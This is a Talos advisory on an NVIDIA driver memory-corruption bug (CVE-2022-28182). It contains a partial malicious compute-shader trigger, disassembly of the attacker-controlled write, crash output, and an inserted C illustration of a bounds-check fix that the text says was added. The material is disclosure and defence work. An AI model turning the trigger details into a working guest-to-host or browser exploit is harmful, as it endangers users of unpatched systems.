Talos Vulnerability Report

TALOS-2021-1437

NVIDIA nvwgf2umx_cfg.dll shader DCL_UNORDERED_ACCESS_VIEW_STRUCTURED memory corruption vulnerability

May 17, 2022
CVE Number

CVE-2022-28182

Summary

A memory corruption vulnerability exists in the shader DCL_UNORDERED_ACCESS_VIEW_STRUCTURED functionality of NVIDIA D3D10 Driver version 496.76, 30.0.14.9676. A specially crafted executable or shader file can lead to memory corruption. This vulnerability could potentially be triggered from guest machines running in virtualization environments (e.g. VMware, QEMU, VirtualBox) in order to perform a guest-to-host escape, as was demonstrated before (TALOS-2018-0533, TALOS-2018-0568, etc.). Theoretically, this vulnerability could also be triggered from a web browser (using WebGL and WebAssembly).

Tested Versions

NVIDIA D3D10 Driver 496.76, 30.0.14.9676

Product URLs

D3D10 Driver - https://nvidia.com

CVSSv3 Score

8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-787 - Out-of-bounds Write

Details

NVIDIA graphics drivers are the software for NVIDIA GPUs installed in a PC. They handle communication between the operating system and the GPU device, and in most cases are required for the hardware to function properly.

We were able to trigger this vulnerability from a Hyper-V guest using the RemoteFX feature, leading to execution of the vulnerable code on the Hyper-V host (inside the rdvgm.exe process). While RemoteFX was recently deprecated by Microsoft, some older machines may still use it (for example, those running an older version of Windows Server).

This vulnerability can be triggered by supplying a malformed compute shader, which leads to memory corruption in the NVIDIA driver.

Example of a compute shader that triggers the bug:

cs_5_0
dcl_global_flags refactoringAllowed
dcl_resource_structured resource[0]
dcl_resource_structured resource[3]
dcl_unordered_access_view_structured u-572719104
...

By modifying the operands of the dcl_unordered_access_view_structured opcode, an attacker is able to trigger a memory corruption vulnerability in the NVIDIA graphics driver.
The attacker can partially control the destination address by modifying the shader's bytecode.

00007FFAF45B2984 | 4B:8D3476                | lea rsi,qword ptr ds:[r14+r14*2]                 |
00007FFAF45B2988 | 8B8424 C8000000          | mov eax,dword ptr ss:[rsp+C8]                    |
00007FFAF45B298F | 0FB69424 E0000000        | movzx edx,byte ptr ss:[rsp+E0]                   |
00007FFAF45B2997 | 44:0FB68424 E8000000     | movzx r8d,byte ptr ss:[rsp+E8]                   |
00007FFAF45B29A0 | 48:C1E6 04               | shl rsi,4                                        |
00007FFAF45B29A4 | 89040E                   | mov dword ptr ds:[rsi+rcx],eax                   |

The attacker controls the R14 register, which the code above scales (lea rsi,[r14+r14*2] followed by shl rsi,4, i.e. r14*48) and adds to RCX to form the destination address of the final MOV instruction.
This leads to an arbitrary memory write in which the attacker controls the destination address.

nvwgf2umx+0x729a4:
00007ffa`f45b29a4 89040e          mov     dword ptr [rsi+rcx],eax ds:0000019c`d558b910=????????
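
The following is an added illustration, not code from the advisory or from the NVIDIA driver. It models the index arithmetic visible in the disassembly above (a 48-byte slot stride, rsi = r14*3 << 4) and shows the bounds check that is missing on the faulting path. The slot layout, the 64-entry slot table and the assumption that the driver sign-extends the 32-bit register operand are all hypothetical; what is taken from the page is the 48-byte stride and the operand value, since u-572719104 is the signed reading of the raw 32-bit value 0xDDDD0000 (which also appears as the fourth argument of frame 00 in the stack trace).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical per-UAV descriptor slot. The 48-byte size mirrors the
 * lea/shl arithmetic in the advisory; the field layout is invented. */
typedef struct {
    uint32_t stride;     /* structured-buffer element stride in bytes */
    uint32_t flags;
    uint8_t  pad[40];    /* pad the slot to 48 bytes */
} uav_slot_t;

_Static_assert(sizeof(uav_slot_t) == 48, "slot size must match r14*48 from the disassembly");

#define UAV_SLOT_COUNT 64u   /* assumed table size; D3D11.1 exposes 64 UAV slots */

typedef struct {
    uav_slot_t slots[UAV_SLOT_COUNT];
} shader_state_t;

typedef enum {
    UAV_DECL_OK = 0,
    UAV_DECL_BAD_INDEX = 1,
    UAV_DECL_BAD_STRIDE = 2
} uav_decl_result_t;

/* Byte offset the unchecked path computes for a declared register index.
 * The operand is treated as a signed 32-bit value sign-extended into a
 * 64-bit register (assumption); arithmetic is done in uint64_t so that
 * the wrap-around is well defined in C. */
uint64_t unchecked_slot_offset(uint32_t raw_index)
{
    uint64_t r14 = (uint64_t)(int64_t)(int32_t)raw_index;
    uint64_t rsi = r14 + r14 * 2;   /* lea rsi,[r14+r14*2] */
    rsi <<= 4;                      /* shl rsi,4  -> r14 * 48 */
    return rsi;                     /* added to the table base by the mov */
}

/* Hardened declaration handler: validate the raw unsigned operand before it
 * is ever used as an index. One unsigned compare rejects both indices past
 * the end of the table and "negative" operands such as 0xDDDD0000. */
uav_decl_result_t declare_uav_checked(shader_state_t *st, uint32_t raw_index, uint32_t stride)
{
    if (raw_index >= UAV_SLOT_COUNT)
        return UAV_DECL_BAD_INDEX;
    /* Structured-buffer strides must be non-zero multiples of 4. */
    if (stride == 0 || (stride & 3u) != 0)
        return UAV_DECL_BAD_STRIDE;

    uav_slot_t *slot = &st->slots[raw_index];   /* offset raw_index*48, now in bounds */
    slot->stride = stride;
    slot->flags = 1u;
    return UAV_DECL_OK;
}

/* Helpers that run the checked handler against a fresh state. */
int demo_declare(uint32_t raw_index, uint32_t stride)
{
    shader_state_t st;
    memset(&st, 0, sizeof st);
    return (int)declare_uav_checked(&st, raw_index, stride);
}

uint32_t demo_stride_after_declare(uint32_t raw_index, uint32_t stride)
{
    shader_state_t st;
    memset(&st, 0, sizeof st);
    if (declare_uav_checked(&st, raw_index, stride) != UAV_DECL_OK)
        return 0;
    return st.slots[raw_index].stride;
}

int main(void)
{
    uint32_t bad = 0xDDDD0000u;   /* raw form of u-572719104 from the advisory */
    printf("table size      : %u bytes\n", (unsigned)sizeof(shader_state_t));
    printf("unchecked offset: 0x%016llx\n", (unsigned long long)unchecked_slot_offset(bad));
    printf("checked result  : %d (1 = bad index)\n", demo_declare(bad, 16));
    printf("checked u3      : %d (0 = ok)\n", demo_declare(3, 16));
    return 0;
}
```

The unchecked offset for the advisory's operand lands far outside the 3072-byte table, which is the same condition the write at nvwgf2umx+0x729a4 hits; the checked handler refuses the declaration before any memory is touched.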

Stack trace:

0:014> kb
 # RetAddr           : Args to Child                                                           : Call Site
00 00007ffa`f4888016 : 000001a3`3be89070 00000000`50000163 00000000`00000020 00000000`dddd0000 : nvwgf2umx+0x729a4
01 00007ffa`f4a6c3ca : 00000071`dc7bf180 00000071`dc7bf100 00000006`00000006 00000006`00000006 : nvwgf2umx!NVDEV_Thunk+0x643d6
02 00007ffa`f4872fff : 00007ffa`f48b89e0 000001a3`3be89070 000001a3`3be89070 00000000`3a010000 : nvwgf2umx!NVDEV_Thunk+0x24878a
03 00007ffa`f4871cf3 : 00000000`3a01009e 00000071`dc7bf690 00000000`3a01009e 000001a3`3be5f230 : nvwgf2umx!NVDEV_Thunk+0x4f3bf
04 00007ffa`f45fb0b0 : 00000000`00000005 00000000`00000000 000001a3`3be617d0 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x4e0b3
05 00007ffa`f45fc686 : 000001a3`3be5f230 000001a3`3be56dc0 000001a3`3be56dd0 00000000`00000000 : nvwgf2umx+0xbb0b0
06 00007ffa`f49908e5 : 00000000`00000000 000001a3`3be54a10 00000000`00000000 00000000`00000000 : nvwgf2umx+0xbc686
07 00007ffa`f4990698 : 00000000`00000000 000001a3`3bfa0d80 00000000`00000002 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x16cca5
08 00007ffa`f4aaf87c : 000001a3`3bf07b60 00000000`00000000 000001a3`3bf07b60 00000000`fffffff1 : nvwgf2umx!NVDEV_Thunk+0x16ca58
09 00007ffa`f5828d58 : 00000000`00000000 00000000`00000000 000001a3`3be3d890 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x28bc3c
0a 00007ffb`531d7034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!OpenAdapter12+0x5b2f48
0b 00007ffb`53e82651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0c 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21

Crash Information

*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** WARNING: Unable to verify checksum for POC_EXEC11.exe

KEY_VALUES_STRING: 1

	Key  : AV.Fault
	Value: Write

	Key  : Analysis.CPU.Sec
	Value: 0

	Key  : Analysis.DebugAnalysisProvider.CPP
	Value: Create: 8007007e on IAMLEGION

	Key  : Analysis.DebugData
	Value: CreateObject

	Key  : Analysis.DebugModel
	Value: CreateObject

	Key  : Analysis.Elapsed.Sec
	Value: 39

	Key  : Analysis.Memory.CommitPeak.Mb
	Value: 74

	Key  : Analysis.System
	Value: CreateObject

	Key  : Timeline.OS.Boot.DeltaSec
	Value: 365974

	Key  : Timeline.Process.Start.DeltaSec
	Value: 119


NTGLOBALFLAG:  470

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffaf45b29a4 (nvwgf2umx+0x00000000000729a4)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000001
   Parameter[1]: 0000019cd558b910
Attempt to write to address 0000019cd558b910

FAULTING_THREAD:  000012dc

PROCESS_NAME:  POC_EXEC11.exe

WRITE_ADDRESS:  0000019cd558b910 

ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwołała się do pamięci pod adresem 0x%p. Pamięć nie może być %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  0000000000000001

EXCEPTION_PARAMETER2:  0000019cd558b910

STACK_TEXT:  
00000071`dc7bf010 00007ffa`f4888016 : 000001a3`3be89070 00000000`50000163 00000000`00000020 00000000`dddd0000 : nvwgf2umx+0x729a4
00000071`dc7bf0b0 00007ffa`f4a6c3ca : 00000071`dc7bf180 00000071`dc7bf100 00000006`00000006 00000006`00000006 : nvwgf2umx!NVDEV_Thunk+0x643d6
00000071`dc7bf130 00007ffa`f4872fff : 00007ffa`f48b89e0 000001a3`3be89070 000001a3`3be89070 00000000`3a010000 : nvwgf2umx!NVDEV_Thunk+0x24878a
00000071`dc7bf160 00007ffa`f4871cf3 : 00000000`3a01009e 00000071`dc7bf690 00000000`3a01009e 000001a3`3be5f230 : nvwgf2umx!NVDEV_Thunk+0x4f3bf
00000071`dc7bf610 00007ffa`f45fb0b0 : 00000000`00000005 00000000`00000000 000001a3`3be617d0 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x4e0b3
00000071`dc7bf6d0 00007ffa`f45fc686 : 000001a3`3be5f230 000001a3`3be56dc0 000001a3`3be56dd0 00000000`00000000 : nvwgf2umx+0xbb0b0
00000071`dc7bf7d0 00007ffa`f49908e5 : 00000000`00000000 000001a3`3be54a10 00000000`00000000 00000000`00000000 : nvwgf2umx+0xbc686
00000071`dc7bfc40 00007ffa`f4990698 : 00000000`00000000 000001a3`3bfa0d80 00000000`00000002 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x16cca5
00000071`dc7bfd50 00007ffa`f4aaf87c : 000001a3`3bf07b60 00000000`00000000 000001a3`3bf07b60 00000000`fffffff1 : nvwgf2umx!NVDEV_Thunk+0x16ca58
00000071`dc7bfe00 00007ffa`f5828d58 : 00000000`00000000 00000000`00000000 000001a3`3be3d890 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x28bc3c
00000071`dc7bfe50 00007ffb`531d7034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!OpenAdapter12+0x5b2f48
00000071`dc7bfe80 00007ffb`53e82651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000071`dc7bfeb0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


SYMBOL_NAME:  nvwgf2umx+729a4

MODULE_NAME: nvwgf2umx

IMAGE_NAME:  nvwgf2umx.dll

STACK_COMMAND:  ~14s ; .cxr ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_nvwgf2umx.dll!Unknown

BUCKET_ID_MODPRIVATE: 1

OS_VERSION:  10.0.19041.1

BUILDLAB_STR:  vb_release

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

FAILURE_ID_HASH:  {4468a1dc-4a01-79b1-d906-401b585901d4}

Followup:     MachineOwner
---------

Timeline

2022-01-13 - Vendor Disclosure
2022-05-16 - Vendor Patch Release
2022-05-17 - Public Release

Credit

Discovered by Piotr Bania of Cisco Talos.